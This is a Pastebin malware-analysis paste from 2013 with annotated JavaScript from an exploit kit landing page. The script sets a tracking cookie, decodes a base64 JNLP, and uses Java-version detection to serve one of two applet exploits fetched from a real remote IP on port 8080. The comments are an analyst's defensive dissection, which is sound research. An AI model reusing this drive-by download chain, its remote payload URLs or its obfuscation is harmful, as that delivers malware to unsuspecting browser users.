Advertisement
MalwareMustDie

Exploit Kit JNLP Calls + Cookie Check + Java ver. Check

Jul 26th, 2013
1,515
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.69 KB | None | 0 0
  1. // #MalwareMustDie!
  2. // JNLP Exploit Kit calls using :
  3. // Cookie Check & Java applet depends on your Java version
  4. // Case: http://www.urlquery.net/report.php?id=4016167
  5. // Glazunov(? how to write this name?) EK
  6.  
  7. // @unixfreaxjp:
  8. // This part is cookie setups...
  9. //
  10. var ws=newDate();
  11. ws.setDate(15+ws.getDate());
  12. document.cookie="stats=446501053769c06c565094b26d26e8ef;
  13. path=/;
  14. expires="+
  15.  
  16. // @unixfreaxjp: Assemble...
  17. ws.toGMTString();
  18.  
  19. // @unixfreaxjp: WTF is this?
  20.  
  21. kvqzu="963372952943740529293246PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxqbmxwIGhyZWY9Im1ubXpqY3Euam5scCIgc3BlYz0iMS4wIiB4bWxuczpqZng9Imh0dHA6Ly9qYXZhZnguY29tIj4NCiAgPGluZm9ybWF0aW9uPg0KICAgIDx0aXRsZT5uOUc4VFpLUlZOUDJ4bnhVNDFmck91d0tBVThZeDwvdGl0bGU+DQogICAgPHZlbmRvcj52VXVvN1RvYzlldlR4Z1A1ZU05SzVSQjwvdmVuZG9yPg0KICA8L2luZm9ybWF0aW9uPg0KICAgPHJlc291cmNlcz4NCiAgICAgICAgPGoyc2UgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZSIgdmVyc2lvbj0iMS43KyIgLz4NCiAgICAgICAgPGphciBocmVmPSJodHRwOi8vMjEyLjEyNC4xMTUuMTk0LXN0YXRpYy5yZXZlcnNlLnNvZnRsYXllci5jb206ODA4MC8yNTEyMDI4MTI2LzU0MTEuemlwIiBtYWluPSJ0cnVlIiAvPg0KICA8L3Jlc291cmNlcz4NCiAgPGFwcGxldC1kZXNjIG1haW4tY2xhc3M9IndlcHRibGtsYWFkcC5mcXZoc3dsdmhsc2poc3JxYWJhdS5jbGFzcyIgbmFtZT0iNmhjNGhrdXpxMGQxeSIgaGVpZ2h0PSIxMCIgd2lkdGg9IjEwIj4NCiAgICAgPHBhcmFtIG5hbWU9Il9fYXBwbGV0X3Nzdl92YWxpZGF0ZWQiIHZhbHVlPSJ0cnVlIiAvPg0KICA8L2FwcGxldC1kZXNjPg0KPC9qbmxwPg==";
  22.  
  23. // @unixfreaxjp:
  24. // See that above long string? is base64,
  25. // it means the JNLP loading like this:
  26. //
  27. // oy79ݽn:<?xml version="1.0" encoding="utf-8"?>
  28. // <jnlp href="mnmzjcq.jnlp" spec="1.0" xmlns:jfx="http://javafx.com">
  29. // <information>
  30. // <title>n9G8TZKRVNP2xnxU41frOuwKAU8Yx</title>
  31. // <vendor>vUuo7Toc9evTxgP5eM9K5RB</vendor>
  32. // </information>
  33. // <resources>
  34. // <j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" />
  35. // <jar href="http://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/5411.zip"
  36. // main="true" />
  37.  
  38. //@unixfreaxjp
  39. // lock and load...
  40.  
  41. pnmoy="jnlp_";uiukv="32584948301f0d71731c7b5a2f032505114c702226504c5d7d7a1b544b415070213a4c2163107f76036547267d4671196c694761394062653d03050e0b0b";aufazh="32584948301f0d71731c7b5a2f032505114c702226504c5d7d7a1b544b415070213a4c2163107f76036547267d4671196c694761394062653d00050e0a0b";
  42. dwssn='Java';
  43. ijjfxi='value';
  44. uybdzqp='param';
  45.  
  46. // @unixfreaxjp:
  47. // Depends on your Java version.. two Applet was served for you....
  48. // You'll go to the URL below... for Java ver 7 OR....
  49.  
  50. cfvxj="ftphttp://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/929";
  51. document.write("
  52. <script
  53. src='"+cfvxj.substr(3)+"'>
  54. <\/script>");</script>
  55.  
  56. // Or else you go to the URL down below...
  57.  
  58. <script>
  59. var v = PluginDetect.getVersion(dwssn).split(',');
  60. if (v[1] == 7) {
  61. document.write('<applet height="10" width="10"><' + uybdzqp + ' name="' + pnmoy + 'href" ' + ijjfxi + '="mnmzjcq.jnlp" /><' + uybdzqp + ' name="' + pnmoy + 'embedded" ' + ijjfxi + '="' + kvqzu.substr(24) + '" /><' + uybdzqp + ' name="hkqrceetlsgftlrdvk" ' + ijjfxi + '="' + uiukv + '" /></applet>');
  62. } else {
  63. document.write('<object type="application/x-java-applet" name="qwakjb" width="10" height="10"><' + uybdzqp + ' name="code" ' + ijjfxi + '="weptblklaadp.nfpmuqaplgapmsrrmnranye.class" /><' + uybdzqp + ' name="archive" ' + ijjfxi + '="http://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/4.zip" /><' + uybdzqp + ' name="hkqrceetlsgftlrdvk" ' + ijjfxi + '="' + aufazh + '" /></object>');
  64. }
  65.  
  66. ---
  67. #MalwareMustDie!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement